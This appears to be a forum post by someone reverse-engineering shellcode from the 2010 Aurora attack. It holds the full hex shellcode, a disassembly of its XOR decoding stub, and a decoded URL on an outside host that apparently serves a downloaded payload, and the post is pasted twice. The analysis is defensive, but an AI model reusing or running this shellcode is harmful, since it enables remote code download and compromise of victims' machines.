051r15
January 21st, 2010, 07:01
Having got a sample of the Aurora attack I'm trying to examine the shellcode.
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
9090eb195b4b9033c990807b01e97501c366b97b0480340bd8e2faeb05e8e2ffffff3139fdffd887bc79fdfffdff5398d453 a8c47553b0d0532fb2d78130fdfffdff483a20b0ebeafdffb08dabbdaa8c539ed430fdfffdff5330fdff8130fdfffdff3a21 b0b7fdffd8b0adaab4b58c539ed43008fdffd85330b2d981309afdffd83a21b0b4ebfdffb0abb0bdb48c539ed430fdfffdff 5330fdff8130fdfffdff3a215934fdfffdff5304591bfdfffdfffdffb2c28bb2d8278e9ceb189858fdffd8ad21515e48fdff d81ffdff84b9f6bd1f9cfdffa0bdfdffeb1189898b8f89eb18539e983086fdffd85bfdffd75dfdfffdfffdfffdfffdfffdff fdfffdfffdff188b539efc30fdfffdff5b2027d75c86fdffd8519eb8fdff88278ef0519ebc535e48fdffd81ffdff84baf6bd 1f9cfdffa0bdfdfffdfffdfffdfffdfffdfffdfffdff988b539efc30fdfffdff5b2027d75cc4fdffd8515e5cfdffd8514654 fdffd8539eb8fdfffdfffdff539eb888278ee01f9ea8fdfffdff1f9efdfffdffd859fdfffdffd8eb035386bcfdff559ea888 fdfffdffd88f27aeb827fdffeb11fdfffdffd858a4d7274dacd458a4d727d8acdd58acd7274d3a33531bfdfffdffd85bfdff fdff5186a8b2d8559eac8827aea88f276e5cfdffd8278ee85933fdfffdff5b23d8a77d27aeb8278eec276e5cfdffd8278eec 535efdfffdff5346fdffd8d81fdcdb84b9f6bd8b278ef4536654fdffd8535e48fdffd81ffdff84baf6bd5934fdfffdff5304 fdfffdffd88bfdfffdffd88ffdfffdff278ec45323eb18eb0359fdfffdffd853145b208ca5d051c4d95bfdff332b53145301 5b1bc8eb1888898b8888888888888f8888539ed0302ffdffd853a6e430ecfdffd830fdfffdffb0bbaeafd8b0abb0bcb78c53 9ed4306efdffd8519ee4bc79fdfffdff5578b8272727b2bd27aee4539ec83042fdffd8eb038b8b8b8b270830fdfffdff5934 fdfffdff53245b1fdc1fdfeaac49d41ffdffbb5109971f9fd078bd4f131f9fd4899862a71f9fc8e6c56ee11f9fcc60b10cc3 1f9fc066a7be781f9fc42471ef751f9ff840d2c820bc79e8fdffd85398d453a8c47553b0d0532f518ebcfdff8130fdfffdff 483a20b0ebeafdffb08dabbdaa8cfdff30cafdffd85330b2dd81305cfdffd83a21eb278f278edc58e03058e031adc959fdff 48484848acd053278d533455fdff273830e0fdffd81b58e03058e031adc959a0dd48484848ac3fb0d0d2fdff5598dd273830 fdfffdff1b30fdfffdff60c9fdff581afdfffdff801b302127272783fdff6051fdffbe1ffdff27381b8b53048bb298b0d8c8 fdff8f539ef8305e272727801b898e53ade453acf6a0db2d8e53aef8db2deb119199fdff1deb03d766c8e20eacd01913fdff 02983329e3c7ad3f865386fcdb05be53d4935386fdff0553dc53db1d7386811b30c22427276a2a3a2c6aeed7cb2890a3e5ea ac49d45d077763bb510997899862fdff4afaa8c67cbc374bea3c4c56cbd274a1e13e401c55c7ac8fbed5279b66740340d2c8 20580e7742238bcdbeb0acaca8e2f7f7bcbdb5b7e9f6beaca8b9bbbbbdababf6bbbbf7bcbdb5b7f7b9bcf6b2a8bfd800
This on execution gives
401020 nop
401021 nop
401022 jmp 1d
40103d call 401024
>>>>>>>>>>>>>>>>>>>>>>>
401024 pop ebx
401025 dec ebx
401026 nop
401027 xor ecx, ecx
401029 nop
40102a cmp byte ptr [ebx+01], e9
40102e jnz 11
401031 mov cx, 47b
401035 xor byte ptr [ecx+ebx], d8
401039 loop 15
... which xors a region with d8 then jumps into this area
40103b jmp 401042
however this turns out to be a jump out of the routine, to a non code area which can't be right
401042 jmp 272608
The xoring looks correct because the string http://demo1.ftpaccess.cc/demo/ad.jpg is revealed presumably as a param to a downloader - what have I missed?
http://wepawet.iseclab.org/view.php?hash=1aea206aa64ebeabb07237f1e2230d0f&type=js
9090eb195b4b9033c990807b01e97501c366b97b0480340bd8e2faeb05e8e2ffffff3139fdffd887bc79fdfffdff5398d453 a8c47553b0d0532fb2d78130fdfffdff483a20b0ebeafdffb08dabbdaa8c539ed430fdfffdff5330fdff8130fdfffdff3a21 b0b7fdffd8b0adaab4b58c539ed43008fdffd85330b2d981309afdffd83a21b0b4ebfdffb0abb0bdb48c539ed430fdfffdff 5330fdff8130fdfffdff3a215934fdfffdff5304591bfdfffdfffdffb2c28bb2d8278e9ceb189858fdffd8ad21515e48fdff d81ffdff84b9f6bd1f9cfdffa0bdfdffeb1189898b8f89eb18539e983086fdffd85bfdffd75dfdfffdfffdfffdfffdfffdff fdfffdfffdff188b539efc30fdfffdff5b2027d75c86fdffd8519eb8fdff88278ef0519ebc535e48fdffd81ffdff84baf6bd 1f9cfdffa0bdfdfffdfffdfffdfffdfffdfffdfffdff988b539efc30fdfffdff5b2027d75cc4fdffd8515e5cfdffd8514654 fdffd8539eb8fdfffdfffdff539eb888278ee01f9ea8fdfffdff1f9efdfffdffd859fdfffdffd8eb035386bcfdff559ea888 fdfffdffd88f27aeb827fdffeb11fdfffdffd858a4d7274dacd458a4d727d8acdd58acd7274d3a33531bfdfffdffd85bfdff fdff5186a8b2d8559eac8827aea88f276e5cfdffd8278ee85933fdfffdff5b23d8a77d27aeb8278eec276e5cfdffd8278eec 535efdfffdff5346fdffd8d81fdcdb84b9f6bd8b278ef4536654fdffd8535e48fdffd81ffdff84baf6bd5934fdfffdff5304 fdfffdffd88bfdfffdffd88ffdfffdff278ec45323eb18eb0359fdfffdffd853145b208ca5d051c4d95bfdff332b53145301 5b1bc8eb1888898b8888888888888f8888539ed0302ffdffd853a6e430ecfdffd830fdfffdffb0bbaeafd8b0abb0bcb78c53 9ed4306efdffd8519ee4bc79fdfffdff5578b8272727b2bd27aee4539ec83042fdffd8eb038b8b8b8b270830fdfffdff5934 fdfffdff53245b1fdc1fdfeaac49d41ffdffbb5109971f9fd078bd4f131f9fd4899862a71f9fc8e6c56ee11f9fcc60b10cc3 1f9fc066a7be781f9fc42471ef751f9ff840d2c820bc79e8fdffd85398d453a8c47553b0d0532f518ebcfdff8130fdfffdff 483a20b0ebeafdffb08dabbdaa8cfdff30cafdffd85330b2dd81305cfdffd83a21eb278f278edc58e03058e031adc959fdff 48484848acd053278d533455fdff273830e0fdffd81b58e03058e031adc959a0dd48484848ac3fb0d0d2fdff5598dd273830 fdfffdff1b30fdfffdff60c9fdff581afdfffdff801b302127272783fdff6051fdffbe1ffdff27381b8b53048bb298b0d8c8 fdff8f539ef8305e272727801b898e53ade453acf6a0db2d8e53aef8db2deb119199fdff1deb03d766c8e20eacd01913fdff 02983329e3c7ad3f865386fcdb05be53d4935386fdff0553dc53db1d7386811b30c22427276a2a3a2c6aeed7cb2890a3e5ea ac49d45d077763bb510997899862fdff4afaa8c67cbc374bea3c4c56cbd274a1e13e401c55c7ac8fbed5279b66740340d2c8 20580e7742238bcdbeb0acaca8e2f7f7bcbdb5b7e9f6beaca8b9bbbbbdababf6bbbbf7bcbdb5b7f7b9bcf6b2a8bfd800
This on execution gives
401020 nop
401021 nop
401022 jmp 1d
40103d call 401024
>>>>>>>>>>>>>>>>>>>>>>>
401024 pop ebx
401025 dec ebx
401026 nop
401027 xor ecx, ecx
401029 nop
40102a cmp byte ptr [ebx+01], e9
40102e jnz 11
401031 mov cx, 47b
401035 xor byte ptr [ecx+ebx], d8
401039 loop 15
... which xors a region with d8 then jumps into this area
40103b jmp 401042
however this turns out to be a jump out of the routine, to a non code area which can't be right
401042 jmp 272608
The xoring looks correct because the string http://demo1.ftpaccess.cc/demo/ad.jpg is revealed presumably as a param to a downloader - what have I missed?
->1027b4d